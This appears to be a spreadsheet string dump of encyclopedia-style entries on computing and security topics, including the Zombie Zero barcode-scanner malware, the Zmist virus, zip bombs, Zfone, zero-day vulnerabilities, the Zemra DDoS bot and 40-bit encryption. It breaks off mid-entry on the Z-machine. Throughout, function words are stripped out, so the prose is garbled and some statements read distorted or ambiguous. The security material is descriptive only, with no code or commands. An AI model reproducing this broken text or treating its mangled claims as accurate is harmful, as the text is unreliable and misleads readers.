    <t>zombie zero attack vector cyber attacker utilized malware clandestinely embedded barcode readers manufactured overseas. remains unknown attack promulgated organized crime nation state. clearly significant planning investment order design malware, embed hardware within barcode scanner. internet things (iot) devices similarly preinstalled malware capture network passwords open backdoor attackers. given high volume devices manufactured overseas high caution exercised placing devices corporate government networks. detailed data attack malware embedded scanner installed wireless network. attack internal network initiated automatically using server message block protocol. stolen data scanned included every piece information item, destination address, source more. this sent clandestinely command control connection back botnet china. this botnet connected lanxiang vocational school located china unicom network shandong province. this school china connected previous attacks, including google operation aurora attack. manufacturer scanner located blocks away school. botnet downloaded second payload broadened command control extended target company's corporate servers finance. attackers looking logistics data shipping worldwide basis, attackers succeeded obtaining detailed financial data customers shipments. detection zombie zero detected using deception technology. references</t>
  </si>
  <si>
    <t>Zmist</t>
  </si>
  <si>
    <t>zmist (also known z0mbie.mistfall) metamorphic computer virus created russian virus writer known z0mbie. first virus technique known "code integration". words ferrie ször: this virus supports unique technique: code integration. mistfall engine contained capable decompiling portable executable files [their] smallest elements, requiring memory. zmist insert code: moves code blocks way, inserts itself, regenerates code data references, including relocation information, rebuilds executable. variants zmist.gen!674cd7362358 discovered 2012. zmist!ik discovered 2011 2012. zmist.a discovered 2006 2007. also simile, well-known metamorphic virus computer virus comparison computer viruses references external links "hunting metamorphic", metamorphic viruses description ször ferrie "virus.win32.zmist.predetect" secure list.</t>
  </si>
  <si>
    <t>Zip bomb</t>
  </si>
  <si>
    <t>bomb, also known decompression bomb death, malicious archive file designed crash render useless program system reading often employed disable antivirus software, order create opening traditional malware.a bomb allows program function normally, but, instead hijacking program's operation, creates archive requires excessive amount time, disk space, memory unpack.most modern antivirus programs detect whether file bomb order avoid unpacking details bomb usually small file ease transport avoid suspicion. however, file unpacked, contents system handle. example bomb file 42.zip, file consisting kilobytes compressed data, containing five layers nested files sets bottom-layer archive containing 4.3-gigabyte (4294967295 bytes; file total petabytes (4503599626321920 bytes; mib) uncompressed data. this file available download various websites across internet, making widely accessible. many anti-virus scanners, layers recursion performed archives help prevent attacks would cause buffer overflow, out-of-memory condition, exceed acceptable amount program execution time. bombs often rely repetition identical files achieve extreme compression ratios. dynamic programming methods employed limit traversal files, file followed recursively level, effectively converting exponential growth linear. there also files that, uncompressed, yield identical copies themselves. sophisticated form bomb exploits specifications files deflate compression algorithm create bombs without nested layers used 42.zip. also billion laughs attack, similar attack parsers black busy beaver, program produces maximal possible output terminating e-mail bomb fork bomb logic bomb references</t>
  </si>
  <si>
    <t>Zfone</t>
  </si>
  <si>
    <t>zfone software secure voice communication internet (voip), using zrtp protocol. created phil zimmermann, creator encryption software. zfone works existing sip- rtp-programs, work sip- rtp-compliant voip-program. zfone turns many existing voip clients secure phones. runs internet protocol stack windows linux intercepts filters voip packets machine, secures call fly. variety different software voip clients used make voip call. zfone software detects call starts, initiates cryptographic agreement parties, proceeds encrypt decrypt voice packets fly. separate gui, telling user call secure. zfone describes end-users "bump wire" voip client internet, acts upon protocol stack. zfone's libzrtp libraries released either affero general public license (agpl) commercial license. note libzrtp libraries provided agpl. parts zfone part libzrtp libraries licensed agpl open source license. although source code components published peer review, remain proprietary. zfone proprietary license also contains time bomb provision. appears zfone development stagnated, however, recent version released 2009. addition, since 2011, possible download zfone developer's website since download server gone offline. platforms specification availability linux, windows compiled programs well sdk. encryption standards based zrtp, uses 128- 256-bit together 3072-bit exchange system voice-based verification prevent man-in-the-middle attacks. zrtp protocol published ietf 6189: "zrtp: media path agreement unicast secure rtp" voip clients zfone tested following voip clients: x-lite, gizmo5, xmeeting, google talk voip client, sjphone. also comparison voip software secure telephone references external links zfone home page phil zimmermann official website cnet news: e-mail security hero takes voip 'wired.com' article april 2006</t>
  </si>
  <si>
    <t>Zerto</t>
  </si>
  <si>
    <t>zerto ltd., main product zerto resilience platform, provides disaster recovery, backup workload mobility software virtualized infrastructures cloud environments. zerto co-headquartered boston israel subsidiary hewlett packard enterprise company. history kedem, zerto's founder ceo, previously co-founded kashya. zerto received investments venture capital firms 83north (formerly greylock il), battery ventures, harmony partners, ventures, ivp, usvp. 2016, company ranked deloitte fast north america list. zerto resilience platform silver winner backup disaster recovery software category storage magazine searchstorage’s 2018 product year. zerto bought hewlett packard enterprise 2021 $374 million. products zerto provides disaster recovery software virtualized cloud infrastructures. company's original product, zerto virtual replication, released august 2011. technology leverages 'hypervisor-based replication', moves data replication server stack storage layer hypervisor. zerto entirely hypervisor storage-agnostic, data replicated operating different platform.zvr initially support microsoft azure. references</t>
  </si>
  <si>
    <t>Zeroshell</t>
  </si>
  <si>
    <t>zeroshell small open-source linux distribution servers embedded systems aims provide network services. administration relies web-based graphical interface; shell needed administer configure zeroshell available live compactflash images, vmware virtual machines. zeroshell installed ia-32 computer almost ethernet interface. also installed embedded devices single-board computers raspberry orange pi.the project reached april 2021 version 3.9.5. there several known vulnerabilities various versions software: v3.6x v3.7, v3.9.0, v3.9.3 last v3.9.5 example, allowing attacker e.g. gain root access device easily. main attack vector script use, 'kerbynet'. selected features radius server able provide strong authentication wireless clients using ieee 802.1x wi-fi protected access (wpa/wpa2) protocols captive portal network authentication hotspots using browser. credentials verified radius server, kerberos (such active directory kdc) netfilter firewall, packet filter stateful packet inspection (spi), layer filter block shape connections generated peer peer clients linux network scheduler control maximum bandwidth, guaranteed bandwidth priority types traffic voip peer-to-peer host-to-lan lan-to-lan ipsec/l2tp openvpn protocols routing bridging capabilities vlan ieee 802.1q support multizone (domain name system) server multi subnet dhcp server pppoe client connection (wide area network) adsl, cable lines dynamic client updater dyndns (network time protocol) client server syslog server receiving cataloging system logs produced remote hosts kerberos authentication ldap server x.509 certification authority also list router firewall distributions references external links official website zeroshell distrowatch</t>
  </si>
  <si>
    <t>Zeroisation</t>
  </si>
  <si>
    <t>cryptography, zeroisation (also spelled zeroization) practice erasing sensitive parameters (electronically stored data, cryptographic keys, critical security parameters) cryptographic module prevent disclosure equipment captured. this generally accomplished altering deleting contents prevent recovery data. mechanical when encryption performed mechanical devices, would often mean changing machine's settings fixed, meaningless value, zero. machines letter settings rather numerals, letter often used instead. some machines button lever performing process single step. zeroisation would typically performed encryption session prevent accidental disclosure keys, immediately risk capture adversary. software modern software based cryptographic modules, zeroisation made considerably complex issues virtual memory, compiler optimisations flash memory. also, zeroisation need applied key, also plaintext intermediate values. cryptographic software developer must intimate understanding memory management machine, prepared zeroise data whenever sensitive device might move outside security boundary. typically involve overwriting data zeroes, case types non-volatile storage process much complex; data remanence. well zeroising data memory management, software designers consider performing zeroisation: when application changes mode (e.g. test mode) user; when computer process changes privileges; termination (including abnormal termination); error condition indicate instability tampering; upon user request; immediately, last time parameter required; possibly parameter required time.informally, software developers also zeroise mean overwriting sensitive data, necessarily cryptographic nature. tamper resistant hardware tamper resistant hardware, automatic zeroisation initiated tampering detected. such hardware rated cold zeroisation, ability zeroise without normal power supply enabled. standards standards zeroisation specified ansi x9.17 fips 140-2. references</t>
  </si>
  <si>
    <t>Z-push</t>
  </si>
  <si>
    <t>z-push (presumably zarafa) foss implementation microsoft exchange activesync protocol used synchronize email, personal contacts items central server mobile device. z-push enables php-based groupware package become fully sync able activesync-compliant device. currently, z-push includes four backends: imap maildir backend e-mail synchronization, vcard backend contact synchronization zarafa package sold allowing full synchronization e-mail, calendar, contacts tasks. there also party project implements zimbra backend allowing z-push used server (including opensource edition). since version 2.3.0, released july 2016, significant performance improvements achieved, well significantly lower memory usage. connecting outlook 2013 2016 also officially supported. with optional kopano outlook extension (available paid subscribers zarafa/kopano), additional outlook features enabled office replies, notes synchronization, opening shared public folders synchronization global address book. z-push active development releases approximately every month including fixes, improvements features. technical background architecture z-push protocol http based, uses wbxml (wap binary xml) communication layer, used bi-directional communication pda/cellular phone server. inside synchronization protocol process sending items side other, keeping track already sent. z-push hides complexity handling protocol requests backend developer, needs implement various standard functions, like getting list items, getting data specific item. needed good understanding wbxml object definitions fields, developer quite easily items groupware solutions onto pda/cellular phone. z-push various performance usability-related features; example, entire architecture project based idea message ever memory time, even server sending hundreds messages pda. this sound easy, xml-based applications, result data built in-memory serialized network exactly opposite z-push does, data streamed client read backend. this improves already restricted memory usage php, also makes progress client user-friendly, data starts arriving soon synchronization request made. z-push provided streaming wbxml encoder decoder make happen. when backend supports z-push also make advanced features bring server load even lower, example reading message changes directly 'diff' source, instead comparing messages whatever last time. groupware backend provide list changes on-the-fly, z-push information almost instantaneously. zarafa provides incremental synchronization backend mapi-based solution php-mapi extension, enabling extremely low-load synchronizations. external links z-push project website download z-push 2.2.x install z-push repo zimbra backend z-push</t>
  </si>
  <si>
    <t>ZeroVM</t>
  </si>
  <si>
    <t>zerovm open source light-weight virtualization sandboxing technology. virtualizes single process using google native client platform. since single process virtualized (instead full operating system), startup overhead order sandboxing zerovm creates sandbox around single process, using technology based google native client (nacl). sandbox ensures application executed cannot access data host operating system, safe execute untrusted code. programs executed zerovm must first cross-compiled nacl platform. zerovm execute nacl code compiled x86-64 platform, portable native client (pnacl) format. code executed zerovm cannot call normal system calls initially cannot interact host environment. communication outside world takes place channels, must declared program starts. outside sandbox, channel connected local file, pipe, another zerovm instance. inside sandbox, program sees channel file descriptor. sandboxed program read/write data from/to channel, know channel connected host. programs compiled zerovm optionally zerovm runtime library called zrt. this library aims provide program posix environment. replacing parts standard library. particular, replaces file input/output functions fopen opendir versions operate in-memory filesystem. root filesystem provided tarball. this allows program "see" normal unix environment. also replaces date time functions time give programs fixed deterministic environment. with fixed inputs, every execution guaranteed give result. even non-functional programs become deterministic restricted environment. this makes programs easier debug since behavior fixed. integration swift zerovm integrated swift, distributed object storage component openstack. when zerocloud middleware installed swift, client make request swift containing zerovm program. program executed directly storage nodes. this means program direct access data. history zerovm developed litestack, israeli startup. first commit zerovm repository added november 2011. litestack bought rackspace october 2013. zerovm participated techstars cloud 2013 incubator program $500,000 seed funding. first zerovm design summit held january 2014 university texas antonio. also google native client (linux containers) seccomp docker (software) references external links official website github stable ubuntu packages latest ubuntu packages</t>
  </si>
  <si>
    <t>Zero-day (computing)</t>
  </si>
  <si>
    <t>zero-day (also known 0-day) computer-software vulnerability previously unknown interested mitigation, like vendor target software. until vulnerability mitigated, hackers exploit adversely affect programs, data, additional computers network. exploit taking advantage zero-day called zero-day exploit, zero-day attack. term "zero-day" originally referred number days since piece software released public, "zero-day software" obtained hacking developer's computer release. eventually term applied vulnerabilities allowed hacking, number days vendor them. once vendors learn vulnerability, usually create patches advise workarounds mitigate recently vendor become aware vulnerability, likely mitigation developed. once developed, chance exploit succeeding decreases users apply time. zero-day exploits, unless vulnerability inadvertently fixed, unrelated update happens vulnerability, probability user applied vendor-supplied patch fixes problem zero, exploit would remain available. zero-day attacks severe threat. attack vectors potential attack vectors zero-day vulnerability identical known vulnerabilities available patches. example, user visits rogue website, malicious code site exploit unpatched vulnerabilities browser. browsers particular target criminals widespread distribution usage. cybercriminals, well international vendors spyware israel’s group, also send malicious e-mail attachments smtp, exploit vulnerabilities application opening attachment. exploits take advantage common file types numerous frequent, evidenced increasing appearances databases us-cert. criminals engineer malware take advantage file type exploits compromise attacked systems steal confidential data. window vulnerability time software exploit first becomes active time number vulnerable systems shrinks insignificance known window vulnerability. timeline software vulnerability defined following main events: vulnerability discovered anyone). t1a: security patch published (e.g., software vendor). t1b: exploit becomes active. most vulnerable systems applied patch.thus formula length window vulnerability t1b. formulation, always true t1a, t1b. note zero. example, hacker first discover vulnerability, vendor might learn much later zero). normal vulnerabilities, t1a. this implies software vendor aware vulnerability time publish security patch (t1a) hacker could craft workable exploit (t1b). zero-day exploits, t1a, exploit becomes active patch made available. disclosing known vulnerabilities, software vendor hopes reach reached, thus avoiding exploits. however, vendor guarantees hackers find vulnerabilities own. furthermore, hackers analyze security patches themselves, thereby discover underlying vulnerabilities automatically generate working exploits. these exploits used effectively time practice, length window vulnerability varies systems, vendors, individual vulnerabilities. often measured days, report 2006 estimating average days. protection zero-day protection ability provide protection zero-day exploits. since zero-day attacks generally unknown public, often difficult defend them. zero-day attacks often effective "secure" networks remain undetected even launched. thus, users so-called secure systems must also exercise common sense practice safe computing habits.many techniques exist limit effectiveness zero-day memory corruption vulnerabilities buffer overflows. these protection mechanisms exist contemporary operating systems macos, windows vista beyond (see also: security safety features windows vista), solaris, linux, unix, unix-like environments; windows service pack includes limited protection generic memory corruption vulnerabilities previous versions include even less. desktop server protection software also exist mitigate zero-day buffer overflow vulnerabilities. typically, technologies involve heuristic termination analysis order stop attacks cause harm.it suggested solution kind reach algorithmically impossible general case analyze arbitrary code determine malicious, analysis reduces halting problem linear bounded automaton, unsolvable. however, unnecessary address general case (that sort programs categories malicious non-malicious) circumstances order eliminate wide range malicious behaviors. suffices recognize safety limited programs (e.g., access modify given subset machine resources) rejecting safe unsafe programs. this require integrity safe programs maintained, prove difficult face kernel-level exploit.the zeroday emergency response team (zert) group software engineers worked release non-vendor patches zero-day exploits. worms zero-day worms take advantage surprise attack still unknown computer security professionals. recent history shows increasing rate worm propagation. well designed worms spread fast devastating consequences internet systems. ethics differing ideologies exist relating collection zero-day vulnerability information. many computer security vendors perform research zero-day vulnerabilities order better understand nature vulnerabilities exploitation individuals, computer worms viruses. alternatively, vendors purchase vulnerabilities augment research capacity. example program tippingpoint's zero initiative. while selling buying vulnerabilities technically illegal parts world, controversy method disclosure. 2006 german decision include article convention cybercrime framework decision attacks information systems make selling even manufacturing vulnerabilities illegal.most formal programs follow form rain forest puppy's disclosure guidelines recent guidelines security vulnerability reporting response. general, rules forbid public disclosure vulnerabilities without notification vendor adequate time produce patch. viruses zero-day virus (also known zero-day malware next-generation malware) previously unknown computer virus malware specific antivirus software signatures available.traditionally, antivirus software relied upon signatures identify malware. virus signature unique pattern code used detect identify specific viruses. antivirus scans file signatures compares database known malicious codes. match, file flagged treated threat. major limitation signature-based detection capable flagging already known malware, making useless zero-day attacks. most modern antivirus software still uses signatures also carries types analysis. code analysis code analysis, machine code file analysed anything looks suspicious. typically, malware characteristic behaviour; code analysis attempts detect present code. although useful, code analysis significant limitations. always easy determine section code intended particularly complex deliberately written intention defeating analysis. another limitation code analysis time resources available. competitive world antivirus software, always balance effectiveness analysis time delay involved. approach overcome limitations code analysis antivirus software suspect sections code safe sandbox observe behavior. this orders magnitude faster analyzing code, must resist (and detect) attempts code detect sandbox. generic signatures generic signatures signatures specific certain behaviour rather specific item malware. most malware totally novel, variation earlier malware, contains code earlier examples malware. thus, results previous analysis used malware. competitiveness antivirus software industry generally accepted antivirus industry vendors' signature-based protection identically effective. signature available item malware, every product (unless dysfunctional) detect however, vendors significantly faster others becoming aware viruses and/or updating customers' signature databases detect them.there wide range effectiveness terms zero-day virus protection. german computer magazine found detection rates zero-day viruses varied 68%. primarily area zero-day virus performance manufacturers compete. u.s. government involvement nsa's zero-day exploits (2017) mid-april 2017 hackers known shadow brokers (tsb), allegedly linked russian government, released files (initially regarded alleged nsa, later confirmed internal details american whistleblower edward snowden) include series 'zero-day exploits' targeting microsoft windows software tool penetrate society worldwide interbank financial telecommunication (swift)'s service provider. technica reported shadow brokers' hacking claims mid-january 2017, april shadow brokers posted exploits proof. vulnerabilities equities process vulnerabilities equities process, first revealed publicly 2016, process used u.s. federal government determine case-by-case basis treat zero-day computer security vulnerabilities: whether disclose public help improve general computer security keep secret offensive government's adversaries. process criticized number deficiencies, including restriction non-disclosure agreements, lack risk ratings, special treatment nsa, less full commitment disclosure default option. also access control bounty program exploit-as-a-service heuristic analysis market zero-day exploits network access control network access protection network admission control software-defined protection targeted attacks vault white (computer security) zero days, documentary zero-days stuxnet references further reading messmer, ellen (april 2007). desktop antivirus dead?". world. archived original april 2016. retrieved july 2015. naraine, ryan (december 2006). "anti-virus dead, d-e-a-d, dead!". eweek. archived original january 2010.examples zero-day attacks (chronological order) "powerpoint zero-day attack case corporate espionage". foxnews. july 2006. naraine, ryan (december 2006). "microsoft issues word zero-day attack alert". eweek. "attackers seize zero-day word". infoworld. february 2007.</t>
  </si>
  <si>
    <t>2X Software</t>
  </si>
  <si>
    <t>software maltese software company specializing virtual desktop, application virtualization, application delivery, remote desktop services, remote access mobile device management. february 2015, software acquired parallels, inc. products, remote application server mobile device management, included parallels' offering. profile company offices united states, germany, australia malta. develops software server-based computing market, application virtualization, remote desktop services virtual desktop infrastructure space. with acquisition 3cx, company extended portfolio include mobile device management.in 2014 finalist best teched 2014, govies government security award 2014 datacenter application product year.the company acquired parallels, inc. february 2015. products remote application server delivers virtual desktops windows applications hosted hypervisors microsoft hyper-v, citrix xenserver, vmware vsphere others, remote mobile desktop devices,2x cloud computing magazine's 2012 cloud computing excellence award. also government security award 2014 named crn's 2014 virtualization list.the latest version released beginning august 2014. main feature updates management windows pseudo thin clients, remote assistance.after acquisition parallels inc., rebranded parallels ras. client client provides remote desktop application access web-enabled device, including android, chrome microsoft windows, linux windows phone, html5 devices. delivers microsoft office applications remote local users major oss. client connects windows windows windows windows 8.1. mobile device management mobile device management platform targeted byod market. available hosted (saas) premises solution. references external links official website</t>
  </si>
  <si>
    <t>389 Directory Server</t>
  </si>
  <si>
    <t>directory server (previously fedora directory server) lightweight directory access protocol (ldap) server developed part community-supported fedora project. name "389" derives port number used ldap. directory server supports many operating systems, including fedora, enterprise linux, debian, solaris, hp-ux 11i. late 2016 project merged experimental freebsd support. however, directory server team 2017 likely remove hpux solaris support upcoming 1.4.x series.the source code generally available general public license version components exception plugin code, components lgplv2 apache. also markets commercial version project directory server part support contracts rhel. history directory server derived original university michigan slapd project. 1996, project's developers hired netscape communications corporation project became known netscape directory server (nds). after acquiring netscape, sold ownership intellectual property microsystems, retained rights akin ownership. sold developed netscape directory server name jes/sunone directory server, oracle directory server since takeover oracle. aol/netscape's rights acquired hat, june 2005, much source code released free software terms general public license (gpl). directory server version (december 2005), released free software remaining source code components included release package (admin server, console, etc.) continues maintain respective licenses.in 2009 fedora directory server project changed name give project distribution vendor neutral name encourage porting running software operating systems. features directory server rfc4511 compliant server. project focus ease use, stability, correctness performance. supported rfcs this subset rfcs directory server supports. features addition supported rfcs, directory server supports number features unique project. also list ldap software references external links official website</t>
  </si>
  <si>
    <t>Zemra</t>
  </si>
  <si>
    <t>zemra ddos first discovered underground forums 2012.zemra capable http flood flooding also simple command control panel protected 256-bit encryption communicating command control (c&amp;c) server. zemra also sends information computer name, language settings, windows version. send data remote location specific date time. also opens backdoor port 7710 receive commands remote command-and-control server, able monitor devices, collect system information, execute files, even update uninstall necessary. also references</t>
  </si>
  <si>
    <t>40-bit encryption</t>
  </si>
  <si>
    <t>40-bit encryption refers (now broken) size forty bits, five bytes, symmetric encryption; represents relatively level security. forty length corresponds total possible keys. although large number human terms (about trillion), possible break degree encryption using moderate amount computing power brute-force attack, i.e., trying possible turn. description typical home computer 2004 could brute-force 40-bit little weeks, testing million keys second; modern computers able achieve much faster. using free time large corporate network botnet would reduce time proportion number computers available. with dedicated hardware, 40-bit broken seconds. electronic frontier foundation's deep crack, built group enthusiasts us$250,000 1998, could break 56-bit data encryption standard (des) days, would able break 40-bit encryption seconds.40-bit encryption common software released 1999, especially based algorithms special "7-day" export review policies, algorithms larger lengths could legally exported united states without case-by-case license. early 1990s general policy, state department allowed exports commercial encryption 40-bit keys, although software could exported u.s.-controlled subsidiaries financial institutions." result, "international" versions browsers designed effective size bits using secure sockets layer protect e-commerce. similar limitations imposed software packages, including early versions wired equivalent privacy. 1992, designed cdmf algorithm reduce strength 56-bit brute force attack bits, order create exportable implementations. obsolescence 40-bit 56-bit encryption algorithms obsolete, vulnerable brute force attacks, therefore cannot regarded secure. result, virtually browsers 128-bit keys, considered strong. most servers communicate client unless 128-bit encryption capability installed public/private pairs used asymmetric encryption (public cryptography), least based prime factorization, must much longer order secure; size details. general rule, modern symmetric encryption algorithms lengths 128, bits. also 56-bit encryption content scramble system footnotes references</t>
  </si>
  <si>
    <t>40-track mode</t>
  </si>
  <si>
    <t>40-track mode steganographic technique allows hidden data inch floppy diskette. technical details inch 1.44mb mini-floppy diskette contains tracks, sectors track, bytes sector. inch 720k diskette contains tracks, sectors track, bytes sector. this technique refers formatting 80-track 1.44mb diskette special 40-track 720kb diskette. create, effect, 40-track partitions. former partitions visible usable normal diskette, latter hidden. fill unallocated (hidden) tracks 720kb secret encrypted data, superficially visible user. writing 1.44mb floppy 40-track mode causes allocated tracks written actual even numbered tracks, thus causing drives attempting read 1.44mb diskette 720kb diskette become confused strange data even numbered tracks. hidden data resides numbered tracks. generally, device drivers copy allocated data, thus traditional copies disk would generally contain hidden data. equivalents technique easily done almost media. this technique different "40th track" copy protection schemes used 90s. history senior agent robert hanssen used technique communicate another 1985 2001 references</t>
  </si>
  <si>
    <t>5-UCO</t>
  </si>
  <si>
    <t>5-uco (5-unit controlled) on-line one-time tape vernam cipher encryption system developed world teleprinter circuits. during 1950s, used liaison cryptanalysis.5-uco fully synchronous, therefore could electrically regenerated tandem high frequency (hf) radio links (i.e. link connected next). could operate directly commercial circuits. system also provided traffic-flow security (tfs). another feature 5-uco receiving operator could maintain synchronisation path delay suddenly changed "walking down" tape (one character time time). this procedure avoided cumbersome task restart.5-uco required large amounts tape operate continual basis. 1960, supplying tape single 5-uco continuous cost £5000 year (equivalent £116,000 2019). logistical problems involved generation, supply destruction sufficient quantities tape limited sensitive traffic. army security agency sought develop replacement, effort later taken newly formed national security agency resulting fielding kw-26 (romulus) system.colonel bellairs awarded sums totalling £2250 development 5-uco, £750 1943, £1,500 1960. timms harwood also awarded £1,000 work random tape 5-uco. also mercury references external links 5-uco crypto museum website rockex</t>
  </si>
  <si>
    <t>56-bit encryption</t>
  </si>
  <si>
    <t>computing, 56-bit encryption refers size fifty-six bits, seven bytes, symmetric encryption. while stronger 40-bit encryption, still represents relatively level security context brute force attack. description government traditionally regulated encryption reasons national security, enforcement foreign policy. encryption regulated 1976 arms export control control transferred department commerce 1996. 56-bit refers size symmetric used encrypt data, number unique possible permutations {\displaystyle 2^{56}} (72,057,594,037,927,936). 56-bit encryption roots des, official standard national bureau standards 1976, later also algorithm. government regulations required users stronger 56-bit symmetric keys submit recovery algorithms like cdmf escrow, effectively reducing strength 40-bit, thereby allowing organisations brute-force encryption. furthermore, 1996 software products exported united states permitted stronger 56-bit encryption, requiring different software editions export markets. 1999, allowed 56-bit encryption exported without escrow recovery requirements. advent commerce internet faster computers raised concerns security electronic transactions initially 40-bit, subsequently also 56-bit encryption. february 1997, data security brute force competition $10,000 prize demonstrate weakness 56-bit encryption; contest four months later. july 1998, successful brute-force attack demonstrated 56-bit encryption deep crack hours.in 2000, restrictions length lifted, except exports embargoed countries.56-bit encryption obsolete, replaced standard 2002 128-bit (and stronger) advanced encryption standard. continues used symmetric cipher combination kerberos older products support newer ciphers like aes. also 40-bit encryption pretty good privacy references</t>
  </si>
  <si>
    <t>64K intro</t>
  </si>
  <si>
    <t>intro demo size executable file limited kibibytes, 65,536 bytes. demo parties, category kind demo, gives best impression wins. intros generally apply many techniques able given size, usually including procedural generation, sound synthesis, executable compression.the size kibibytes traditional limit inherited maximum size file. history demos traditionally limited system memory size, later storage available (although demos multiple discs unheard of). early 1990s, especially machines started large hard discs internet connections, demo sizes grew, reaction limited size categories forced devs simply stream data storage started become common demo parties. scene evolved, size limited demos settled 64k.fr-08, demo farbrausch released party 2000 aars since claimed mark watershed moment popularity category. notable intros chaos theory, conspiracy, 2006 gaia machina, approximate, 2012 felix's workshop, ctrl-alt-test, 2012 fermi paradox, mercury, 2016 darkness your eyes upon conspiracy, 2016 references external links annual scene.org awards best scene.org file archive</t>
  </si>
  <si>
    <t>80 Plus</t>
  </si>
  <si>
    <t>plus (trademarked plus) voluntary certification program launched 2004, intended promote efficient energy computer power supply units (psus). certification acquirable products energy efficiency 20%, 100% rated load, power factor greater 100% load. history epri (electric power research) ecos consulting (promoter brand) develop generalized internal power supply efficiency test protocol desktop derived multi-output power supplies. march 2004: plus idea presented initiative aceee market transformation symposium. february 2005: first market-ready power supply created seasonic. 2006: energy star added plus requirements then-upcoming effect since july 2007) energy star computer specifications. november february 2006: dell certify psus plus specification. july 2007: energy star computer specification goes effect. specification includes plus power supply efficiency levels desktop computers. december 2007: psus market plus certified becoming market standard. first-quarter 2008: standards revised bronze, silver, gold higher efficiency level certifications. october 2009: added specification platinum efficiency level. february 2012: dell delta electronics working together able achieve world-first plus titanium server power supply. efficiency level certifications categories certification: lists power supplies certified desktop, workstation, non-redundant server applications. lists power supplies certified redundant, data center applications. industrial lists power supplies industrial applications. units physical format (embedded, encapsulated, open frame, rack mount, din-mount). internal power supplies certified desktop, workstation, server applications non-redundant configurations.for higher certification levels, requirement better power factor extended apply load levels, well 100% load. platinum level requires 0.95 better power factor servers. climate savers computing initiative efficiency level targets workstations 2007 2011, corresponding plus certification levels. from july 2007 june 2008, basic plus level (energy star 4.0). next year, target plus bronze level, following year plus silver, plus gold, finally platinum. redundancy typically used data centers. misleading power supply advertising there instances companies claim imply supplies plus certified, cases meet requirements. when company resells power supply name must certified name company, even supply certified. instances, reseller claimed higher wattage supply deliver case, reseller's supply would meet plus requirements. plus website list certified supplies, possible confirm supply meets requirements.although power supply manufacturers name products similar names, plus", plus" plus" official certification standard. verify certification other misleading consumers falsely claiming certification similar names companies "reselling", another companies confuse consumers claiming meet certain certification requirement fact not. example, highest plus titanium (96% efficiency load). some companies claim meet requirement even close (i.e. 95.xx%) therefore claiming titanium. however, case could easily modify test unit enhanced production models order slightly raise numbers.the plug load solutions official website provides lists certifications company, allowing consumers verify many models listed. example, take look highest rating available plus titanium) 230v internal category (most common industrial psus) comparison; compuware corporation leads models, followed super micro computer, inc. plus titanium units, close third place delta electronics units. technical overview efficiency computer power supply output power divided input power; remaining input power converted heat. instance, 600-watt power supply efficiency running full load would draw 1000 mains would therefore waste heat. hand, 600-watt power supply efficiency running full load would draw mains would therefore waste heat. given power supply, efficiency varies depending much power delivered. supplies typically efficient half three-quarters load, much less efficient load, somewhat less efficient maximum load. older power supplies typically efficient. qualify plus, power supply must achieve least efficiency three specified loads (20%, 100% maximum rated power). however, plus supplies still less efficient lower loads. instance, plus, watt supply could still less efficient watts typical idle power desktop computer). thus still important select supply capacity appropriate device powered. easier achieve higher efficiency levels higher wattage supplies, gold platinum supplies less available consumer-level supplies reasonable capacity typical desktop machines. typical computer power supplies power factors 0.6. higher power factor reduces peak current draw, reducing load circuit uninterruptible power supply. reducing heat output computer helps reduce noise, since fans spin fast cool computer. reduced heat resulting lower cooling demands increase computer reliability.the testing conditions give unrealistic expectation efficiency heavily loaded, high power (rated much larger supplies. heavily loaded power supply computer powering generate significant amounts heat, raise power supply temperature, likely decrease efficiency. since power supplies certified room temperature, effect taken account.80 plus efficiency targets load. instance, generation standby power still relatively inefficient, meet requirements watt initiative. testing plus power supplies shows vary considerably standby efficiency. some power supplies consume half watt less standby load, others consume several times much standby, even though meet higher plus certification requirement levels. also adapter green computing energy management power management performance watt quiet references external links official website plus certified power supplies manufacturers (official ecova list), plug load solutions.</t>
  </si>
  <si>
    <t>ZeroTier</t>
  </si>
  <si>
    <t>zerotier inc. software company freemium business model based irvine, california. zerotier provides proprietary software, sdks commercial products services create manage virtual software-defined networks. company's flagship end-user product zerotier client application enables devices pcs, phones, servers embedded devices securely connect peer-to-peer virtual networks. software tools zerotier markets proprietary tools, licensed business source license 1.1, intended support development deployment virtual data centers: 2021, product line consists following tools: zerotier one, first released 2014, portable client application provides connectivity public private virtual networks. central, web-based portal managing virtual networks. libzt (sdk), linkable library provides functionality zerotier embedded applications services. (pronounced "aleph"), fully decentralized fully replicated key/value store. client zerotier client used connect virtual networks previously created zerotier central web-based endpoint connections peer-to-peer end-to-end encrypted. stun hole punching used establish direct connections peers behind nat. direct connection route discovery made help global network root servers mechanism similar webrtc. controller virtual networks created managed using zerotier controller. management done using api, proprietary web-based (zerotier central), open-source web-based alternative. using root servers hosted zerotier inc. impeded software's license. security following considerations apply zerotier's sdwan application: asymmetric public encryption curve25519, 256-bit elliptic curve variant. traffic encrypted layer using 256-bit salsa20 authenticated using poly1305 message authentication (mac) algorithm. computed encryption (encrypt-then-mac) cipher/mac composition used identical nacl reference implementation. packages zerotier available multiple platforms multiple forms: microsoft windows installer (.msi) apple macintosh (.pkg) iphone/ipad/ipod docker source code github linux binaries (deb rpm) linux snap package (works across distributions) linux library android google play qnap (.qpkg) synology packages (.spk) western digital mycloud ex2, ex4, ultra (.bin) freebsd port package openwrt community maintained port github mikrotik's routeros similar projects freelan gnunet ipop logmein hamachi openvpn tinc wireguard netmaker twingate tailscale also webrtc references external links teamviewer linux-to-windows equivalent</t>
  </si>
  <si>
    <t>Z-machine</t>
  </si>
  <si>
    <t>z-machine virtual machine developed joel berez marc blank 1979 used infocom text adventure games. infocom compiled game code files containing z-machine instructions (called story files z-code files) could therefore port text adventures platform simply writing z-machine implementation platform. with large number incompatible home computer systems time, important advantage using native code developing compiler system. history z-machine stands zork, infocom's first adventure game. z-code files usually names ending .z1, .z2, .z3, .z4, .z5, .z6, .z7, .z8, number version number z-machine file intended run, given first byte story file.this modern convention, however. infocom used extensions .dat (data) .zip (zip z-machine interpreter program), latter clashed widespread .zip pkzip-compatible archive files starting 1990s, activision closed infocom. infocom produced versions z-machine. files using versions rare. only version files known released infocom version version covers majority infocom's released games. later versions capabilities, culminating graphic support version compiler (called zilch) infocom used produce story files never released, although documentation language used (zil, lisp-family language similar mdl) still exists, open-source replacement written. after mediagenic moved infocom california 1989, computer gaming world stated "zil functionally dead", reported rumors "completely parser never used". 1993, graham nelson released first version inform compiler, also generates z-machine story files output, even though inform source language quite different zil. inform become popular interactive fiction community. large proportion interactive fiction form z-machine story files. demand ability create larger game files nelson specify versions z-machine, though version rarely used. because addresses handled, version story file 128k length, version story 256k length, version story 512k length. though sizes seem small today's computing standards, 